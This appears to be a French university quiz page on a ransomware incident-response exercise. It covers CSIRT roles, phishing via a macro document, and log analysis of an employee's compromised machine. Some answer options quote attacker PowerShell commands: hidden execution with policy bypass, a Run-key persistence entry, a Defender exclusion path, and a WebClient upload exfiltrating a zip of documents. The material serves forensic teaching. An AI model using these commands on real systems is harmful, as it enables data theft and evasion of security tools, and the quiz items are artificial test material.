Quelle technique a permis au malware de se propager à d'autres machines ?

Partages réseau via le protocole SMB

Quel indicateur de compromission (IOC) est utilisé pour détecter la communication avec le serveur de commande ?

Le nom de domaine d’un site de streaming

Quels sont les différents types de notifications reçues par Alice Martin le 23/04/2025 entre 08:15 et 10:50 ?

Notifications de connexion et alertes de sécurité

Notifications de livraisons et achats

Quel email contient une pièce jointe suspecte (docm) et quel est son sujet ?

"Urgent! Vérification de votre compte bancaire"

"Mise à jour de votre identifiant Apple"

"Confirmation de votre paiement"

"Nouvelle politique de télétravail"

Quelle commande a été utilisée pour extraire le fichier joint dans le dossier C:\Temp ?

"powershell -WindowStyle Hidden -ExecutionPolicy Bypass -Command '$payload = [ System.IO .Compression.ZipFile]::ExtractToDirectory('C:\Users\alice.martin\Downloads\validation_crédit.docm','C:\Temp');'"

"Compress-Archive -Path 'C:\Users\alice.martin\Documents\*' -DestinationPath 'C:\Temp\ data.zip '"

"Get-EventLog -LogName System -Newest 5"

"Test-Connection google.com -Count 2"

Quelle action a été réalisée pour désactiver la sécurité sur la machine d'Alice Martin ?

Désactivation de la surveillance en temps réel, de la protection contre les logiciels malveillants et du scan des scripts dans les préférences de Windows Defender

Désactivation du pare-feu Windows

Suppression des fichiers de log de l'antivirus

Téléchargement et exécution d'un antivirus alternatif

Quelle commande a été utilisée pour garantir que le script malveillant soit exécuté automatiquement au démarrage de la machine ?

"Set-ItemProperty -Path 'HKCU:\Software\Microsoft\Windows\CurrentVersion\Run' -Name 'Updater' -Value 'C:\Temp\script.ps1'"

"$dlPath = 'C:\Temp\script.ps1'; Invoke-Expression (Get-Content $dlPath -Raw)"

"Add-MpPreference -ExclusionPath 'C:\Users\alice.martin\AppData\Roaming'"

"Start-Process 'C:\Users\alice.martin\AppData\Roaming\update.exe'"

Quelle commande a été utilisée pour exfiltrer des données depuis la machine d'Alice Martin vers un serveur externe ?

"(New-Object System.Net .WebClient).UploadFile('4W3i2hguUU7u4VXoby6tK22cszwNjV883sxPsjvybVcYYTtJD2b', 'C:\Temp\ data.zip ')"

"Get-ChildItem C:\Users\alice.martin\Documents -Recurse | Measure-Object"

"Compress-Archive -Path 'C:\Users\alice.martin\Documents\*' -DestinationPath 'C:\Temp\ data.zip '"

Quel fichier malveillant a été téléchargé et quelle commande a été utilisée pour le télécharger ?

"Un fichier nommé update.exe, téléchargé via DownloadFile."

"Un fichier zip contenant des données personnelles, téléchargé avec Compress-Archive."

"Un script Powershell nommé script.ps1, téléchargé via Invoke-Expression."

"Un programme de nettoyage téléchargé depuis un serveur interne."

Quelles actions ont été effectuées par Alice Martin à 08:44:00 ?

Copie de fichiers des partages vers son dossier personnel

Déconnexion du serveur finance

Suppression du fichier update.exe

Que fait Alice Martin immédiatement après avoir copié update.exe sur les serveurs ?

Elle accède aux fichiers update.exe sur les deux serveurs

Elle se déconnecte sans action

Elle exécute un script PowerShell

Parmi les affirmations suivantes, laquelle décrit le mieux l’ensemble de ses actions ?

Alice Martin a exfiltré des données et propagé le ransomware sur les serveurs

Alice Martin a tenté de restaurer une sauvegarde

Alice Martin a copié des fichiers à des fins de sauvegarde

Alice Martin a agi en tant qu’administratrice réseau légitime

Quelle information importante peut-on déduire du WHOIS de l’IP 185.129.62.62 ? (Partie "Détails" dans VirusTotal)

L’IP appartient à une entreprise danoise qui héberge des serveurs Tor

L’IP appartient à un fournisseur cloud américain, L’IP est utilisée pour héberger des services de streaming

L’IP est associée à un service de messagerie chiffrée allemand

Présentation_FionaP_I-Tracing

Authored by Fiona Piquet

Information Technology (IT)

University

Used 1+ times

AI Actions

Add similar questions

Adjust reading levels

Convert to real-world scenario

Translate activity

More...

Content View

Student View

35 questions

Show all answers

MULTIPLE CHOICE QUESTION

30 sec • 1 pt

Le CSIRT a pour mission principale de détecter, analyser et répondre aux incidents de sécurité informatique.

Vrai

Faux

MULTIPLE CHOICE QUESTION

30 sec • 1 pt

Le CSIRT est uniquement chargé de la communication externe avec la presse en cas de cyberattaque.

Vrai

Faux

MULTIPLE CHOICE QUESTION

30 sec • 1 pt

Le CSIRT peut être impliqué dans des actions de prévention, comme des campagnes de sensibilisation à la cybersécurité.

Vrai

Faux

MULTIPLE CHOICE QUESTION

30 sec • 1 pt

Quelle est la première action recommandée après avoir été informé que Machine1 est infectée ?

Redémarrer Machine1 pour interrompre l'infection

Isoler Machine1 du réseau pour contenir la menace

Mettre à jour les antivirus sur Machine1

Supprimer les fichiers suspects détectés manuellement

MULTIPLE CHOICE QUESTION

1 min • 1 pt

Pourquoi la présence de plusieurs machines non surveillées dans le même VLAN que Machine1 est-elle préoccupante ?

Cela complique la mise à jour des correctifs de sécurité

Le risque de propagation non détectée est plus élevé

Ces machines peuvent ralentir l'analyse de l'antivirus

Elles empêchent le SOC d'agir sur Machine1

MULTIPLE CHOICE QUESTION

15 mins • 1 pt

Quel vecteur d’infection est utilisé par le groupe EncryptoLOL pour accéder à Machine1 ?

Téléchargement via un site web de streaming

Pièce jointe malveillante dans un e-mail de phishing

Clé USB infectée laissée sur un parking

Vulnérabilité non corrigée dans le navigateur

MULTIPLE CHOICE QUESTION

1 min • 1 pt

Quel rôle joue PowerShell dans l’attaque d’EncryptoLOL ?

Il a été utilisé pour supprimer les sauvegardes

Il a servi à exécuter la charge utile après activation d’une macro

Il a permis la communication avec le C2 en HTTPS

Il a désinstallé les antivirus

Access all questions and much more by creating a free account

Create resources

Host any resource

Get auto-graded reports

Continue with Google

Continue with Email

Continue with Classlink

Continue with Clever

or continue with

Microsoft

Apple

Others

Already have an account?

Similar Resources on Wayground

33 questions

CH 07 - PILHAS - Rodrigo Siega

Quiz

•

University

40 questions

Cuestionario de Repaso Final Entorno Económico Digital

Quiz

•

University

40 questions

Bioconstrucción

Quiz

•

11th Grade - University

30 questions

Herramientas de Adobe Animate

Quiz

•

6th Grade - University

35 questions

Computer System Architecture

Quiz

•

University

35 questions

Cuestionario sobre CNN

Quiz

•

University

36 questions

Mi primer CNN

Quiz

•

University

30 questions

Planning for Security Quiz

Quiz

•

University

Popular Resources on Wayground

10 questions

5.P.1.3 Distance/Time Graphs

Quiz

•

5th Grade

10 questions

Fire Drill

Quiz

•

2nd - 5th Grade

20 questions

Equivalent Fractions

Quiz

•

3rd Grade

22 questions

School Wide Vocab Group 1 Master

Quiz

•

6th - 8th Grade

20 questions

Main Idea and Details

Quiz

•

5th Grade

20 questions

Context Clues

Quiz

•

6th Grade

20 questions

Inferences

Quiz

•

4th Grade

12 questions

What makes Nebraska's government unique?

Quiz

•

4th - 5th Grade

Discover more resources for Information Technology (IT)

18 questions

Informative or Argumentative essay

Quiz

•

5th Grade - University

20 questions

Disney Trivia

Quiz

•

University

5 questions

Human Impacts: How Do People Disrupt Ecosystems?

Interactive video

•

4th Grade - University

7 questions

Human Body Systems Overview (Updated 2024)

Interactive video

•

11th Grade - University

20 questions

Context Clues

Quiz

•

KG - University

7 questions

Comparing Fractions

Interactive video

•

1st Grade - University

20 questions

10.4 Exponential Functions

Quiz

•

8th Grade - University

30 questions

PSYCH 250: Exam 3

Quiz

•

University